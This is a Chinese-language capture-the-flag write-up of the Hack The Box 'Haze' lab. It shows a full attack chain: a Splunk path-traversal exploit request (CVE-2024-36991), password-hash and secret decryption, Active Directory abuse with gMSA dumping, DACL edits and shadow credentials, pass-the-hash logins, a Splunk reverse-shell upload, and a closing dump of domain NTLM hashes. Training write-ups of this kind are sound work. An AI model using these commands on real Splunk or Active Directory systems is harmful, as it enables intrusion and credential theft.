HTB-Haze笔记

2025年4月6日01:01:16评论103 views字数 5587阅读18分37秒阅读模式

扫描靶机

nmap -A -v -T4 10.10.11.61

可以得到一个dc01.haze.htb域名，并且可以发现一个splunkd的站点，打开看看

在网上可以搜到该系统的poc

https://github.com/Mr-xn/CVE-2024-36991

直接使用burpsuite抓包，然后利用poc

可以利用这个poc直接使用LFI漏洞

https://github.com/bigb0x/CVE-2024-36991

python3 CVE-2024-36991.py -u http://haze.htb:8000/

成功拿到了一个哈希，但是直接跑rockyou跑不出

:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

根据这个splunk的用户文件，直接获得用户配置信息

https://docs.splunk.com/Documentation/Splunk/latest/Admin/Authenticationconf

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=

可以获得他的哈希，但是破解不了，这时候使用splunk专用的

https://github.com/HurricaneLabs/splunksecrets.git

然后找到splunk.secret文件，这个是用来存储 Splunk 实例的加密密钥读取里面编码，在Program Files/Splunk/etc/auth/splunk.secret，因为有空格，所以我编译成url

保存本地splunk.secret，然后使用工具破解

splunksecrets splunk-decrypt -S splunk.secret

跑出密码是：Ld@p_Auth_Sp1unk@2k24，然后根据之前在配置文件里面拿到的用户名，枚举一下用户名

netexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-bruteAdministratorGuestkrbtgtpaul.taylormark.adamsedward.martinalexander.greenDC01$Haze-IT-Backup$

做成用户字典，然后枚举登录winrm

netexec winrm haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'

看来mark.adams用户适配密码，直接登录winrm

evil-winrm -i haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'

查看当前用户的组，可以看到在gMSA_Managers组里面，使用gMSADumper工具

https://github.com/micahvandeusen/gMSADumper

python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb

然后授权mark.adams用户权限，以便查看Haze-IT-Backup$账号信息

Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"

成功设置后继续使用gMSADumper工具导出哈希

python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htbaze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebcHaze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01eda60fdHaze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95

上传SharpHound获得内网信息，然后进去看看

可以看到[email protected]用户指向[email protected]组，并且是WriteOwner关系，说明意该用户可以修改该组的所有者，从而可能导致权限提升

https://youtu.be/fqYoOoghqdE

使用impacket里面owneredit工具

impacket-owneredit -action write -target 'SUPPORT_SERVICES' -new-owner 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb

然后更换到dacl工具取得权限

impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb

然后使用先生成IT的i票据，然后导出

python3 getTGT.py haze.htb/Haze-IT-Backup$ -hashes ':a70df6599d5eab1502b38f9c1c3fd828'export KRB5CCNAME=Haze-IT-Backup$.ccache

使用bloodyAD工具将Haze.htb域中dc01.haze.htb上的“SUPPORT_SERVICES”AD对象的所有者更改为Haze IT Backup$

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u $'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" $'Haze-IT-Backup$'

利用booldyAD授予Haze IT Backup$对dc01.Haze.htb上Active Directory中的SUPPORT_SERVICES用户对象的GenericAll权限（完全控制）

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'

然后将Haze IT Backup$添加为dc01.Haze.htb上Active Directory中SUPPORT_SERVICES组的成员。

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" 'Haze-IT-Backup$'

然后进行影子凭证攻击

bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add shadowCredentials "edward.martin"

生成一个新的密码

openssl pkcs12 -export -out ikun.pfx -inkey AyYeZBye_priv.pem -in AyYeZBye_cert.pem

然后使用certipy工具获取edward.martin用户的哈希

certipy auth -pfx ikun.pfx -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61 -debugaad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af

直接使用哈希登录winrm

evil-winrm -i 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af

在C:backupsSplunk里面有splunk的压缩包，下载下来

下载完后然后翻一下垃圾，在Splunk/etc/auth/有个splunk.secret，然后在Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/有个authentication.conf配置文件，直接之前的类似进行破解

成功破解出密码是：Sp1unkadmin@2k24，然后直接登录splunk页面

登录成功了，github有个专门的splunk反弹shell

https://github.com/0xjpuff/reverse_shell_splunk

然后将其打包成spl格式，然后上传，成功反弹shell

输入whomi /priv，可以看到SeImpersonatePrivilege已经开启了，直接土豆梭哈

                                                                                                                                ss *                                                                                                                                         Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:a70df6599d5eab1502b38f9c1c3fd828:::

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

HTB-Haze笔记

Vulnhub-zico2靶机教学

使用 PowerShell 中的动态 API 解析绕过 AMSI

Sunder：旨在利用 BYOVD 漏洞的 Windows rootkit

浅谈常见edu漏洞，逻辑漏洞，越权，接管到getshell，小白如何快速找准漏洞

【云安全】k8s漏洞合集 | k8s安全攻防

Doppelganger项目 - 模仿灵魂，不留痕迹

SpEL表达式漏洞注入内存马

挖洞小记 | 记一次拿下某软柿子证书站过程！

渗透测试 FastJSON 是个延时炸弹？

HTB - BigBang

发表评论

在线咨询

微信